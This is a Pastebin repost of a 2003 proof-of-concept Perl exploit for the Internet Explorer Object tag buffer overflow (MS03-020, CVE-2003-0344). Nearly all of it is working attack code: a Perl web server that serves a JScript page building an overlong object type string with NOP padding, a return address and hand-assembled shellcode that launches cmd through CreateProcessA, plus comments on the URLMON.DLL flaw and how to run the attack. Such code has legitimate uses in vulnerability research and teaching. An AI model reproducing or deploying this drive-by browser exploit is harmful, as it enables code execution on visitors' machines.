Advertisement
FlyFar

Microsoft Internet Explorer - Object Tag (MS03-020) - CVE-2003-0344

Feb 2nd, 2024
1,534
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 2.21 KB | Cybersecurity | 0 0
  1. #!/usr/bin/perl
  2.  
  3. #
  4. #  Proof of concept exploit on IE 5.x - 6.x by Alumni
  5. #  IE-Object longtype dynamic call oferflow
  6. #
  7. #  url://<$shellcode><'/'x48><jmp %ptr_sh>
  8. #  the flaw actually exists in URLMON.DLL when converting backslashes
  9. #  to wide char, this can be seen on stack dump near '&CLSID=AAA...2F__2F__...'.
  10. #  
  11. #  To exploit:  i)  start server perl script;
  12. #        ii) connect to http-service using IE/5.x.
  13. #                   a) the shellcode size is limited up to 56 bytes;
  14. #        b) the '$ret' may differ as well as the image base of KERNEL32.DLL;
  15. #        c) to avoid multiple encoding the shellcode is given 'as is' with help of JScript.
  16. #
  17.  
  18. use IO::Socket;
  19.  
  20. $port = 80;
  21. $server = IO::Socket::INET->new (LocalPort => $port,
  22.                 Type =>SOCK_STREAM,
  23.                 Reuse => 1,
  24.                 Listen => $port) or die("Couldnt't create
  25. server socket\n");
  26.  
  27.  
  28. $shellcode =    "\x33\xdb".     # xor ebx, ebx
  29.         "\x8b\xd4".     # mov edx, esp
  30.         "\x80\xc6\xff".     # add dh, 0xFF
  31.         "\xc7\x42\xfc\x63\x6d". # mov dword ptr[edx-4], 0x01646D63
  32. ("cmd\x01")
  33.         "\x64\x01".     #
  34.         "\x88\x5a\xff".     # mov byte ptr[edx-1], bl
  35.         "\x8d\x42\xfc".     # lea eax, [edx-4]
  36.         "\x8b\xf5".     # mov esi, ebp
  37.         "\x56\x52".     # push esi; push edx
  38.         "\x53\x53\x53\x53\x53\x53". # push ebx
  39.         "\x50\x53".     # push eax; push ebx
  40.         "\xb8\x41\x77\xf7\xbf". # mov eax, 0xBFF77741 ~=
  41. CreateProcessA
  42.         "\xff\xd0".     # call eax
  43.         "\xb8\xf8\xd4\xf8\xbf". # mov eax, 0xBFF8D4F8 ~=
  44. ExitProcess
  45.         "\xff\xd0".     # call eax
  46.         "\xcc";         # int 3
  47.  
  48. $nop = "\x90";
  49. $ret = "\\xAB\\x5D\\x58";
  50.  
  51.  
  52. while ($client = $server->accept()) {
  53.     while (<$client>) {
  54.         if ($_ =~ /^(\x0D\x0A)/) {
  55.  
  56. print $client <<END_DATA;
  57. HTTP/1.0 200 Ok\r
  58. Content-Type: text/html\r
  59. \r
  60. &lt;script&gt;\r
  61.     var mins = 56;\r
  62.     var size = 48;\r
  63.     var sploit = "$shellcode";\r
  64.     var strNop = "$nop";\r
  65.     var strObj = '&lt;object type="';\r
  66.     for (i=0;i<mins-sploit.length;i++) strObj += strNop;\r
  67.     strObj += sploit;\r
  68.     for (i=0;i<size;i++) strObj += '/';\r
  69.     strObj += "CCCCCCCCDDDDDDDD";\r
  70.     strObj += "$ret";\r
  71.     strObj += '">Hello&lt;/object&gt;';\r
  72.     alert(strObj);\r
  73.     document.write(strObj);\r
  74. &lt;/script&gt;\r
  75. END_DATA
  76.             close($client);
  77.  
  78.         }
  79.     }
  80. }
  81.  
  82. close($server);
  83.  
  84. # milw0rm.com [2003-06-07]
  85.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement